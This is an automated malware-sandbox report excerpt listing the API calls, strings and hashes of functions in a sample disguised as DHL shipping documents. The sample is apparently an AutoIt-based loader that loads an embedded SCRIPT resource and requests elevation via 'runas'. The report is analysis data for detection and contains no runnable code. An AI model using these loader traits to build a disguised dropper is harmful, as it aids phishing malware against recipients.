GetNativeSystemInfo, xrefs: 001B4460
kernel32.dll, xrefs: 001B444F

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: 8d766ff88b6d0042c5b5c38c477f7786895a2816c4c8936103c2a41eae0601a6
Instruction ID: 524569ce8276a89d717a8da2eb5a768e01bc9445743ce9ed336db6339c0e0cbd
Opcode Fuzzy Hash: 8d766ff88b6d0042c5b5c38c477f7786895a2816c4c8936103c2a41eae0601a6
Instruction Fuzzy Hash: 71A1C27E90B2C4DFD716D7697C4C1E57FAC6B26700B1888D9E08193AE2D36046BACB21

Function 001B42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,001B50AA,?,?,00000000,00000000), ref: 001B42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001B50AA,?,?,00000000,00000000), ref: 001B42C9
LoadResource.KERNEL32(?,00000000,?,?,001B50AA,?,?,00000000,00000000,?,?,?,?,?,?,001B4F20), ref: 001F35BE
SizeofResource.KERNEL32(?,00000000,?,?,001B50AA,?,?,00000000,00000000,?,?,?,?,?,?,001B4F20), ref: 001F35D3
LockResource.KERNEL32(001B50AA,?,?,001B50AA,?,?,00000000,00000000,?,?,?,?,?,?,001B4F20,?), ref: 001F35E6

Strings

SCRIPT, xrefs: 001B42BF

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: f85d7d4d29fa496dc5ba01fa0ccefb8dca819da64075606be29e2e23df2fa252
Instruction ID: 3a9a11cf81ed2eab188322265b095dda74e450a61fd55254feae298d7d7d2032
Opcode Fuzzy Hash: f85d7d4d29fa496dc5ba01fa0ccefb8dca819da64075606be29e2e23df2fa252
Instruction Fuzzy Hash: C4118274201700BFD7258FA9EC49F677BB9EBC6B51F248169F842D6160DBB1DC009620

Function 001F2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 001B2B6B

Part of subcall function 001B3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00281418,?,001B2E7F,?,?,?,00000000), ref: 001B3A78

Part of subcall function 001B9CB3: _wcslen.LIBCMT ref: 001B9CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00272224), ref: 001F2C10
ShellExecuteW.SHELL32(00000000,?,?,00272224), ref: 001F2C17

Strings

runas, xrefs: 001F2C0B

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: 96e4830efe97c01f2f52e136b03f463d8324130738138b6a43acfe2f659a9e43
Instruction ID: de60f798db2fb1d1ec8bbf0e69f2d08d6f54f2211f67e2f3674515e26f365ec1
Opcode Fuzzy Hash: 96e4830efe97c01f2f52e136b03f463d8324130738138b6a43acfe2f659a9e43
Instruction Fuzzy Hash: FE11B131209305AAC714FF64E895DFEBBA8ABB2300F54142DF596560E2CF318A6A8712

Function 001BD730 Relevance: 21.6, APIs: 14, Instructions: 631windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 001BD807
timeGetTime.WINMM ref: 001BDA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001BDB28
TranslateMessage.USER32(?), ref: 001BDB7B
DispatchMessageW.USER32(?), ref: 001BDB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 001BDB9F
Sleep.KERNEL32(0000000A), ref: 001BDBB1

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: 3316d977a79d53d59661ca72f2096369d7c1c3b902b312b1084c1f7b77b5adfe
Instruction ID: 11492c1fd20e5d959990bb5cd1976ccd596b84d63b1cb2c41f5180c90b812d3b
Opcode Fuzzy Hash: 3316d977a79d53d59661ca72f2096369d7c1c3b902b312b1084c1f7b77b5adfe
Instruction Fuzzy Hash: 6442F330614342DFD72DCF24D888BAAB7E4BF56304F54455EE45A872D2E770E868CB92

Function 001B344D Relevance: 19.5, APIs: 6, Strings: 5, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001B3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00281418,?,001B2E7F,?,?,?,00000000), ref: 001B3A78

Part of subcall function 001B3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 001B3379

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 001B356A
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001F318D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001F31CE
RegCloseKey.ADVAPI32(?), ref: 001F3210
_wcslen.LIBCMT ref: 001F3277
_wcslen.LIBCMT ref: 001F3286

Strings

X[, xrefs: 001B349D
\, xrefs: 001F328C
Include, xrefs: 001F3184, 001F31C5
Software\AutoIt v3\AutoIt, xrefs: 001B3560
\Include\, xrefs: 001B3527

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
String ID: Include$Software\AutoIt v3\AutoIt$X[$\$\Include\
API String ID: 98802146-2759511475
Opcode ID: 86c850cd39a4b4b1fa982a6736e990ba4b63b8afb59b32f79f537b699b14042d
Instruction ID: a45a7be0ec885fad6e1d6e0c68c17469f29748cc2700fbe9b1134b5c08a874db
Opcode Fuzzy Hash: 86c850cd39a4b4b1fa982a6736e990ba4b63b8afb59b32f79f537b699b14042d
Instruction Fuzzy Hash: E371BF75406304DFC314EF69EC959ABBBE8FFA5740F50082EF555971A0EB309A48CB62

Function 001B2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 001B2D07
RegisterClassExW.USER32(00000030), ref: 001B2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001B2D42
InitCommonControlsEx.COMCTL32(?), ref: 001B2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001B2D6F
LoadIconW.USER32(000000A9), ref: 001B2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001B2D94

Strings

AutoIt v3 GUI, xrefs: 001B2D23
TaskbarCreated, xrefs: 001B2D37
0, xrefs: 001B2CE9
+, xrefs: 001B2CF0

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: d2376ba5347e9f04a79b08fd7dc6f602a89ee6e327346ad0989f78a2ab316dc7
Instruction ID: 973a16e353253d903468ea12830cec0afd082f472d4a088b7facc8794b54d650
Opcode Fuzzy Hash: d2376ba5347e9f04a79b08fd7dc6f602a89ee6e327346ad0989f78a2ab316dc7
Instruction Fuzzy Hash: B421E3B9952318AFDB40DFA8E84DBDDBBB8FB09700F10411AF511A62A0D7B14551CF90

Function 001F065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001F039A: CreateFileW.KERNELBASE(00000000,00000000,?,001F0704,?,?,00000000,?,001F0704,00000000,0000000C), ref: 001F03B7

GetLastError.KERNEL32 ref: 001F076F
__dosmaperr.LIBCMT ref: 001F0776
GetFileType.KERNELBASE(00000000), ref: 001F0782
GetLastError.KERNEL32 ref: 001F078C
__dosmaperr.LIBCMT ref: 001F0795
CloseHandle.KERNEL32(00000000), ref: 001F07B5
CloseHandle.KERNEL32(?), ref: 001F08FF
GetLastError.KERNEL32 ref: 001F0931
__dosmaperr.LIBCMT ref: 001F0938

Strings

H, xrefs: 001F08BD

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 62bc8268af0378e007c5fb49056a346569ed1acfbca8aa20e55ac016dff191e9
Instruction ID: 3302e00ee84afa6a936527ba9f62544986d9bac06ee8c2cc9c6fe6f3270bbad3
Opcode Fuzzy Hash: 62bc8268af0378e007c5fb49056a346569ed1acfbca8aa20e55ac016dff191e9
Instruction Fuzzy Hash: 3BA14736A001088FDF1AAF68DC95BBE7BA0AB1A324F14415DF915DF392DB319D12CB91

Function 001B2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 001B2B8E
LoadCursorW.USER32(00000000,00007F00), ref: 001B2B9D
LoadIconW.USER32(00000063), ref: 001B2BB3
LoadIconW.USER32(000000A4), ref: 001B2BC5
LoadIconW.USER32(000000A2), ref: 001B2BD7
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 001B2BEF
RegisterClassExW.USER32(?), ref: 001B2C40

Part of subcall function 001B2CD4: GetSysColorBrush.USER32(0000000F), ref: 001B2D07
Part of subcall function 001B2CD4: RegisterClassExW.USER32(00000030), ref: 001B2D31
Part of subcall function 001B2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001B2D42
Part of subcall function 001B2CD4: InitCommonControlsEx.COMCTL32(?), ref: 001B2D5F
Part of subcall function 001B2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001B2D6F
Part of subcall function 001B2CD4: LoadIconW.USER32(000000A9), ref: 001B2D85
Part of subcall function 001B2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 001B2D94

Strings

AutoIt v3, xrefs: 001B2C2F
#, xrefs: 001B2C16
0, xrefs: 001B2C0F

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: 45dd1bc6f65b7114d942beff89e41caa79dd2d40e3099b8aaa50cf632e39f399
Instruction ID: 841da6b1c6c0882e1020c8dc51be992ce4366838db892c2733a5ec4acb1d785b
Opcode Fuzzy Hash: 45dd1bc6f65b7114d942beff89e41caa79dd2d40e3099b8aaa50cf632e39f399
Instruction Fuzzy Hash: 74212C78E52314ABDB109FA9FC5DAEDBFB8FB48B50F14009AE500A66E0D7B10561CF90

Function 001BB710 Relevance: 16.3, APIs: 1, Strings: 8, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001BBB4E

Strings

p#(, xrefs: 001BBA72
x#(, xrefs: 00200168
p#(, xrefs: 0020024F
p%(, xrefs: 001BB8DC
p#(, xrefs: 00200263
p%(, xrefs: 001BBB32
x#(, xrefs: 00200207
p#(, xrefs: 001BBB6B

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Init_thread_footer
String ID: p#($p#($p#($p#($p%($p%($x#($x#(
API String ID: 1385522511-1050141907
Opcode ID: d48163a7b516f02f6f47487ac5e51c052312966ffee6a16620eee57a53bdaa3b
Instruction ID: f3a377fd3a8ea064c4a8ac0e79b350c864e6896727a9b6d2eda14e35376fe7d3
Opcode Fuzzy Hash: d48163a7b516f02f6f47487ac5e51c052312966ffee6a16620eee57a53bdaa3b
Instruction Fuzzy Hash: C232BC74A0820ADFEB24CF54C8D4BBEB7B5EF44304F158099E905AB6A2C7B4ED51CB91

Function 001B3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,001B316A,?,?), ref: 001B31D8
KillTimer.USER32(?,00000001,?,?,?,?,?,001B316A,?,?), ref: 001B3204
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001B3227
RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,001B316A,?,?), ref: 001B3232
CreatePopupMenu.USER32 ref: 001B3246
PostQuitMessage.USER32(00000000), ref: 001B3267

Strings

TaskbarCreated, xrefs: 001B322D

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: fed32f06d75da06a0786401758e8f1b90b4b2a48c22c0ddec0ba6727ea3386ca
Instruction ID: b4d50b6bcd27406de9c64334947c4055c3e450ee4d127e2a675cb60570ea71c1
Opcode Fuzzy Hash: fed32f06d75da06a0786401758e8f1b90b4b2a48c22c0ddec0ba6727ea3386ca
Instruction Fuzzy Hash: 75414B3D251208ABDB193B7CEC1EBF93A5DEB06340F140165F622862E2CB718E7197A1

Function 001BDFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON

Download Yara Rule

Strings

D%(, xrefs: 00202FDA
Variable must be of type 'Object'., xrefs: 002032B7
D%(D%(, xrefs: 001BE27E
D%(, xrefs: 0020302D
D%(, xrefs: 001BE1E0
D%(, xrefs: 001BE4B1

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID:
String ID: D%($D%($D%($D%($D%(D%($Variable must be of type 'Object'.
API String ID: 0-1394618807
Opcode ID: 9297e2d1a4dacd82c53931e11b766ba58489d6b9aa18f1882ac2d49bd834f66b
Instruction ID: 417bf578d6e7e51fd75a36f19f031e48cd97fdd7e12fb392462710c9dcfe02b2
Opcode Fuzzy Hash: 9297e2d1a4dacd82c53931e11b766ba58489d6b9aa18f1882ac2d49bd834f66b
Instruction Fuzzy Hash: 8EC27775A00215CFCB24CFA8C884AEDB7F5BF18310F258569E906AB3A2D375ED51CB91

Function 01189F08 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01189FD9
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0118A1FF

Memory Dump Source

Source File: 00000000.00000002.1660351923.0000000001187000.00000040.00000020.00020000.00000000.sdmp, Offset: 01187000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1187000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction ID: fadd61a4fc830e868444296098e79526d8c6fe6b81fbe5f117a26f512fd73f56
Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
Instruction Fuzzy Hash: 90A11870E00209EBDB18DFA4D894BEEBBB5BF48704F20815AE611BB281D7759A41CF55

Function 001B10F3 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 153
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 001B1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001B1BF4
Part of subcall function 001B1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 001B1BFC
Part of subcall function 001B1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001B1C07
Part of subcall function 001B1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001B1C12
Part of subcall function 001B1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 001B1C1A
Part of subcall function 001B1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 001B1C22

Part of subcall function 001B1B4A: RegisterWindowMessageW.USER32(00000004,?,001B12C4), ref: 001B1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001B136A
OleInitialize.OLE32 ref: 001B1388
CloseHandle.KERNEL32(00000000,00000000), ref: 001F24AB

Strings

@, xrefs: 001B12A8
, xrefs: 001B118A
, xrefs: 001B1292

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID: $ $@
API String ID: 1986988660-4052845253
Opcode ID: 128578b273e72b9395d2fef9475f031d658c76aab6b2b966a72f15b4bb65dab1
Instruction ID: 1dbd40e83b46311920a30bb217daf3c59ec05a9802fd6cacb4861ce22df11b2b
Opcode Fuzzy Hash: 128578b273e72b9395d2fef9475f031d658c76aab6b2b966a72f15b4bb65dab1
Instruction Fuzzy Hash: B5718DBC9132009ED384EF79F95D6A53AEDBB98344794812AD40AC72E2EB384432CF45

Function 001B2C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 001B2C91
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 001B2CB2
ShowWindow.USER32(00000000,?,?,?,?,?,?,001B1CAD,?), ref: 001B2CC6
ShowWindow.USER32(00000000,?,?,?,?,?,?,001B1CAD,?), ref: 001B2CCF

Strings

edit, xrefs: 001B2CAC
AutoIt v3, xrefs: 001B2C89, 001B2C8E, 001B2C8F

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 32814bab34c398bf60fcd75ae8d4640f1bf802855e1e689e44b8a90acfe66f18
Instruction ID: 268ddf577bb52f8a974862ee3126de70fac8b00f50c8520c9d1de679da4bfffd
Opcode Fuzzy Hash: 32814bab34c398bf60fcd75ae8d4640f1bf802855e1e689e44b8a90acfe66f18
Instruction Fuzzy Hash: C3F0DA795423907AEB711717BC0CEB76EBDD7C7F50B10009AF900A65A0C6751862DBB0

Function 01189CD8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01189BC8: Sleep.KERNELBASE(000001F4), ref: 01189BD9

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01189DFE

Strings

7QALY09835C4149JRSLYI66C, xrefs: 01189E61, 01189E64

Memory Dump Source

Source File: 00000000.00000002.1660351923.0000000001187000.00000040.00000020.00020000.00000000.sdmp, Offset: 01187000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1187000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CreateFileSleep
String ID: 7QALY09835C4149JRSLYI66C
API String ID: 2694422964-595200822
Opcode ID: b3251e0a7046556b2165d1a35f64238d0356f0058148bcf2d3a322a1c061a704
Instruction ID: 26919a0d807e290f3732a4e50ef6b90e7810efeba617f7d0bf38fc7256ec337f
Opcode Fuzzy Hash: b3251e0a7046556b2165d1a35f64238d0356f0058148bcf2d3a322a1c061a704
Instruction Fuzzy Hash: C551A230D0429DEAEF15EBE4C854BEEBBB89F55304F048599E6047B2C1D7B90B45CBA1

Function 001B3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,001B3B0F,SwapMouseButtons,00000004,?), ref: 001B3B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,001B3B0F,SwapMouseButtons,00000004,?), ref: 001B3B61
